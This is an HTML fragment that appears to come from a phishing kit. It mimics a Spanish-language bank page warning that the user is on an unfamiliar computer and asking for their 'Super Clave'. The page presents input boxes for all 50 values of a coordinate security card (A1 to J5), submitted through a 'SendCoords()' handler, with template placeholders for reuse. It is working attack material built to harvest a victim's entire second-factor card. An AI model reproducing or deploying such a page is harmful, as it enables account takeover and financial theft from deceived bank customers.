   <input type="hidden" id="modulo" name="modulo" value="<!--modulo-->">
      <input  type="hidden" name="coord[A1]" value="Coord Complete!">
          <h1><img src="../../../pagina/images/panel/icn-candado.png" width="25" height="25"><strong>Confirmar operaci&oacute;n <!--title--></strong></h1>
			<h3>No est&aacute;s operando desde tu computador habitual, por favor ingresa tu <strong>Super Clave</strong> para continuar con el ingreso a tus cuentas.</h3>
              
              <p>(*)Sus datos son importantes, para poder acceder a esa funcionalidad se requiere validaci&oacute;n con SuperClave</p>
        <table width="190" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <td width="20" height="20">
				<img src="../../../pagina/images/panel/lateral01.png" width="20" height="20" border="0"></td>
              <td width="150"  height="20" bgcolor="#CD3833"><font size="1" face="Tahoma" color="#FFFFFF">Asegúrese que el número de serie de su <strong><!--NumbCoords--></strong></font></td>
              <td width="20"  height="20">
				<img src="../../../pagina/images/panel/lateral02.png" width="20" height="20" border="0"></td>
            </tr>
            <tr>
              <td bgcolor="#CD3833"></td>
              <td width="12"><table border="0" width="81" id="table1" align="center"><tr>
				<td colspan="3" bgcolor="#FFFFFF">
				<table id="table1" width="93%" border="0" cellspacing="1"><tr>
					<td width="12" bgcolor="#D12221" align="center">&nbsp;</td>
					<td width="14" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>A</b></font></td>
					<td width="19" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>B</b></font></td>
					<td width="15" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>C</b></font></td>
					<td width="19" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>D</b></font></td>
					<td width="15" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>E</b></font></td>
					<td width="19" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>F</b></font></td>
					<td width="15" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>G</b></font></td>
					<td width="19" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>H</b></font></td>
					<td width="15" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>I</b></font></td>
					<td width="19" bgcolor="#CD3833" align="center">
					<font color="#FFFFFF" face="Tahoma"><b>J</b></font></td></tr><tr>
						<td width="12" bgcolor="#9E3541" align="center"><b>
						<font size="2" color="#FFFFFF" face="Tahoma">1</font></b></td>
						<td width="14" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[A1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[B1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[C1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[D1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[E1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[F1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[G1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[H1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[I1]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[J1]" class="coords" size="1" style="font-weight: bold"/></td></tr><tr>
						<td width="12" bgcolor="#DD4835" align="center"><b>
						<font size="2" color="#FFFFFF" face="Tahoma">2</font></b></td>
						<td width="14" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[A2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[B2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[C2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[D2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[E2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[F2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[G2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[H2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[I2]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[J2]" class="coords" size="1" style="font-weight: bold"/></td></tr><tr>
						<td width="12" bgcolor="#9E3541" align="center"><b>
						<font size="2" color="#FFFFFF" face="Tahoma">3</font></b></td>
						<td width="14" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[A3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[B3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[C3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[D3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[E3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[F3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[G3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[H3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[I3]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[J3]" class="coords" size="1" style="font-weight: bold"/></td></tr><tr>
						<td width="12" bgcolor="#DD4835" align="center"><b>
						<font size="2" color="#FFFFFF" face="Tahoma">4</font></b></td>
						<td width="14" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[A4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[B4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[C4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[D4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[E4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[F4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[G4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[H4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[I4]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#EAECEA">
						<input type="text" maxlength="2" name="coord[J4]" class="coords" size="1" style="font-weight: bold"/></td></tr><tr>
						<td width="12" bgcolor="#9E3541" align="center"><b>
						<font size="2" color="#FFFFFF" face="Tahoma">5</font></b></td>
						<td width="14" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[A5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[B5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[C5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[D5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[E5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[F5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[G5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[H5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="15" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[I5]" class="coords" size="1" style="font-weight: bold"/></td>
						<td width="19" bgcolor="#C8CAC8">
						<input type="text" maxlength="2" name="coord[J5]" class="coords" size="1" style="font-weight: bold"/></td></tr></table></tr></table></td>
              <td bgcolor="#CD3833"></td>
            </tr>
            <tr>
              <td  height="20" width="20">
				<img src="../../../pagina/images/panel/lateral03.png" width="20" height="20" border="0"></td>
              <td   height="20" bgcolor="#CD3833"> 
				<font size="1" face="Tahoma" color="#FFFFFF">Si es así, ingrese el valor de las siguientes coordenadas</font> </td>
              <td   height="20" width="20">
				<img src="../../../pagina/images/panel/lateral04.png" width="20" height="20" border="0"></td>
            </tr>
          </table>
          <h2 id="coord-info"></h2>
          <p><input type="image" src="../../../pagina/images/panel/siguiente.jpg" onclick="SendCoords();"></p>